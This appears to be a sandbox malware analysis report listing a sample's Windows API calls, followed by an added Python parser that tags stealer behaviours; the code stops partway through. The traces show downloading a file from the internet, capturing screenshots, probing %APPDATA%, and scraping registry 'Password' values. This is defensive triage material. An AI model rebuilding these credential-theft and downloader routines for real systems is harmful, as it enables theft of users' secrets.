                        • lstrcat.KERNEL32(00000000,?), ref: 00921704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092172A
                        • lstrlen.KERNEL32(015EF1F8), ref: 0092173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921762
                        • lstrcat.KERNEL32(00000000,015EF1F8), ref: 0092176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921792
                        • ShellExecuteEx.SHELL32(?), ref: 009217CD
                        • ExitProcess.KERNEL32 ref: 00921803
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: e4fb390419a8c508c40af2ddf8ce9c6e510e930a535f820cd0c92d5271cebae6
                        • Instruction ID: 182ebcaaec5b7e75fdb3588f022e6a5e239480d117558f665521506f4524a7c3
                        • Opcode Fuzzy Hash: e4fb390419a8c508c40af2ddf8ce9c6e510e930a535f820cd0c92d5271cebae6
                        • Instruction Fuzzy Hash: AA516271A0162AAFDB11DFA4DD88A9EB7FDAF98300F244125F505E3295DF70AE05CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0091F026
                        • lstrlen.KERNEL32(00000000), ref: 0091F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0091F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0091F081
                        • lstrlen.KERNEL32(?), ref: 0091F094
                        • lstrlen.KERNEL32(00000000), ref: 0091F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0091F13F
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: aa1cc1e77232c57430b9be1cb4b66eb0a410061e263b8b74553c36662ea35a10
                        • Instruction ID: ede40f0b5603efcd31020540a84802d8d3ab71b14f7f4faba7f6f7836dec1c8b
                        • Opcode Fuzzy Hash: aa1cc1e77232c57430b9be1cb4b66eb0a410061e263b8b74553c36662ea35a10
                        • Instruction Fuzzy Hash: 28518C31B142099FCB21AF78DD59BAE77E8AF94300F154568F84ADB292DE30EC458B90
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(015E8BB8,00B39BD8,0000FFFF), ref: 0090A026
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090A053
                        • lstrlen.KERNEL32(00B39BD8), ref: 0090A060
                        • lstrcpy.KERNEL32(00000000,00B39BD8), ref: 0090A08A
                        • lstrlen.KERNEL32(00934C4C), ref: 0090A095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A0B2
                        • lstrcat.KERNEL32(00000000,00934C4C), ref: 0090A0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090A0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090A114
                        • SetEnvironmentVariableA.KERNEL32(015E8BB8,00000000), ref: 0090A12F
                        • LoadLibraryA.KERNEL32(015D5568), ref: 0090A143
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: 9baefdb3f660e6ae7d2ca601f3e790ac4e54495ac493774c28637f70d4967225
                        • Instruction ID: a6e08adb3f36fd1c0a946b5e9beb09c9c2575b481afc4854ea018802dca36a10
                        • Opcode Fuzzy Hash: 9baefdb3f660e6ae7d2ca601f3e790ac4e54495ac493774c28637f70d4967225
                        • Instruction Fuzzy Hash: AF91A130A00B109FD7319FA8DC88A6A37B9EB94715F604528F5158B2E2EFB5DD40CBC2
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091C8A2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0091C8FC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091C932
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 0091C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: e8b1177334586ee7d9764f04a69f11d9780d73d0475d3d108f7d8971255e5325
                        • Instruction ID: 62bb393bc3aee82918b16ed19da905d4b212ba0b736fab95c059e513c20c4a84
                        • Opcode Fuzzy Hash: e8b1177334586ee7d9764f04a69f11d9780d73d0475d3d108f7d8971255e5325
                        • Instruction Fuzzy Hash: 9661D1B1F512199FCB12EFB4C989AEE7BBCAF49700F100069E842E7241DB749D458BA1
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00920CF0), ref: 00924276
                        • GetDesktopWindow.USER32 ref: 00924280
                        • GetWindowRect.USER32(00000000,?), ref: 0092428D
                        • SelectObject.GDI32(00000000,00000000), ref: 009242BF
                        • GetHGlobalFromStream.COMBASE(00920CF0,?), ref: 00924336
                        • GlobalLock.KERNEL32(?), ref: 00924340
                        • GlobalSize.KERNEL32(?), ref: 0092434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: 9eda8efbefd7ac7e34fb6b529e750335b6ce74630015b72fa14f7be67ba61b67
                        • Instruction ID: b4471b4e4ef8fdca56bd34df4fd95714adb1b0094f8a95481c279dbc335eca74
                        • Opcode Fuzzy Hash: 9eda8efbefd7ac7e34fb6b529e750335b6ce74630015b72fa14f7be67ba61b67
                        • Instruction Fuzzy Hash: C5511275A10209AFDB10EFA4ED89AEE77B9EF88300F204519F905E7250DF74AD05CB91
                        APIs
                        • lstrcat.KERNEL32(?,015EFFD0), ref: 0091E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E07D
                        • lstrcat.KERNEL32(?,?), ref: 0091E098
                        • lstrcat.KERNEL32(?,?), ref: 0091E0AC
                        • lstrcat.KERNEL32(?,015DA780), ref: 0091E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0091E0D4
                        • lstrcat.KERNEL32(?,015EEEB0), ref: 0091E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 425881b9a9f78d7145584f8c7b1dc17e5bac3388d169d95afe0ea523e2bd0473
                        • Instruction ID: bc8e695151bc55dc280e92c0efdbe18b7b8efbcabe0456ddd41ae4b9c44a119c
                        • Opcode Fuzzy Hash: 425881b9a9f78d7145584f8c7b1dc17e5bac3388d169d95afe0ea523e2bd0473
                        • Instruction Fuzzy Hash: F2613E71A1011CAFCB55DB64DD48BDD77B8BF88300F2049A5BA0AA3290DF70AF859F90
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906AFF
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 00906B2C
                        • StrCmpCA.SHLWAPI(?,015F0268), ref: 00906B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00906B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00906B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00906BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00906BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00906BF0
                        • CloseHandle.KERNEL32(00000000), ref: 00906C10
                        • InternetCloseHandle.WININET(00000000), ref: 00906C17
                        • InternetCloseHandle.WININET(?), ref: 00906C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: ab42ad9ce95d580b7e23a7b171047e918f085e22ad66331ae19bcc5a14c5e857
                        • Instruction ID: 6f323266d88da2ed5d3a78951d7f26c3cddbcd867a7e36b0c5ffb22a40a4e623
                        • Opcode Fuzzy Hash: ab42ad9ce95d580b7e23a7b171047e918f085e22ad66331ae19bcc5a14c5e857
                        • Instruction Fuzzy Hash: FA416FB1A40215AFEB24DF64DC89FAE77B9EB44701F104554FA05E71D0EF70AE448BA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090BC1F
                        • lstrlen.KERNEL32(00000000), ref: 0090BC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090BC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090BC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090BCAC
                        • lstrlen.KERNEL32(00934AD4), ref: 0090BD23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: b0be0e517ff3944481a20cdbcf286f6965f8a98d0432398590d0a9631ccc02fc
                        • Instruction ID: 2d511756f6cf6b9564102efcf5185083ff79c6f9f768bb76ef437879de0b28fd
                        • Opcode Fuzzy Hash: b0be0e517ff3944481a20cdbcf286f6965f8a98d0432398590d0a9631ccc02fc
                        • Instruction Fuzzy Hash: 3FA16070601205DFDB25DF68D949BAEB7B8AF84304F288469E80AEB2E1DF35DC45CB50
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00926014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0092609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 009260D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 9f6058093bbd9101c0c0de69e01b37cab8f89d20656120cae4525cc1baa8bcc3
                        • Instruction ID: 4e34f9bd04c95670c92e277faf1f05d7d3de2b85a8c59207731b88e534b4934d
                        • Opcode Fuzzy Hash: 9f6058093bbd9101c0c0de69e01b37cab8f89d20656120cae4525cc1baa8bcc3
                        • Instruction Fuzzy Hash: AD61C030700520DBDB28CF5DEDD4AAEB3B6EF84304B254A09E48287789C730ED80DB94
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E07D
                        • lstrcat.KERNEL32(?,?), ref: 0091E098
                        • lstrcat.KERNEL32(?,?), ref: 0091E0AC
                        • lstrcat.KERNEL32(?,015DA780), ref: 0091E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0091E0D4
                        • lstrcat.KERNEL32(?,015EEEB0), ref: 0091E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: d08ad239b6d5a3c4f55c0702c3f02a871854996115a0587b2e30e871f1507d37
                        • Instruction ID: bccf74ef83275f26d5051f74d93fc49ecb44cbd81cef81c6ee3f6c073a3a0e52
                        • Opcode Fuzzy Hash: d08ad239b6d5a3c4f55c0702c3f02a871854996115a0587b2e30e871f1507d37
                        • Instruction Fuzzy Hash: BF413D71A1011CAFCB25EB68DD49ADD77B8BF88310F1049A5F90A93291DF749F898F90
                        APIs
                          • Part of subcall function 009077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00907805
                          • Part of subcall function 009077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0090784A
                          • Part of subcall function 009077D0: StrStrA.SHLWAPI(?,Password), ref: 009078B8
                          • Part of subcall function 009077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009078EC
                          • Part of subcall function 009077D0: HeapFree.KERNEL32(00000000), ref: 009078F3
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 00907A90
                        • lstrcat.KERNEL32(00000000,?), ref: 00907ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 00907ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 00907AF0
                        • wsprintfA.USER32 ref: 00907B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 00907B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00907B47
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 00907B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: b38708a3953b8d8a0ce180b58ccb1e4f669caac5ce126149a4529e58085c62f2
                        • Instruction ID: ae092fb5d3415cc3f684c037985dc75add968208c7304c25d31367cbbb605f6c
                        • Opcode Fuzzy Hash: b38708a3953b8d8a0ce180b58ccb1e4f669caac5ce126149a4529e58085c62f2
                        • Instruction Fuzzy Hash: 88319272E04214AFCB14DBA8DC849AFF7B9EB88714F254519F50693290DF74F941CBA1
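                        The four function entries above (the WinINet download-to-file loop at 00906B2C, the GDI/HGlobal screenshot routine at 00924276, the SHGetFolderPathA/GetFileAttributesA probe at 0091E037 and the HKCU RegEnumValueA/StrStrA "Password" scrape at 00907805) are the parts of this listing a triage analyst actually cares about, and they are buried between hundreds of lstrcpy/lstrcat entries. The following is an added example, not part of the Joe Sandbox report or of the sample: a small Python parser for the report's "APIs" bullet format that tags each function entry with the behaviour its API subsequence implies and names the constant arguments (CSIDL, HKEY root, CreateFile access and disposition) that would otherwise be looked up by hand. The sample input is constructed from lines copied from the entries above; the rule names are this example's own labels, not Joe Sandbox signature names; the sandbox prints the InternetOpenUrlA flags argument as a signed value (-00800100), so it is deliberately left undecoded.

```python
# Added example: parse Joe Sandbox "APIs" listings and tag the stealer behaviours they imply.
import re
from typing import NamedTuple, Optional

# Constructed sample: API lines copied from four function entries of the report
# (downloader, screenshot, %APPDATA% probe, registry credential scrape).
SAMPLE = """\
APIs
• InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 00906B2C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00906B6A
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00906B88
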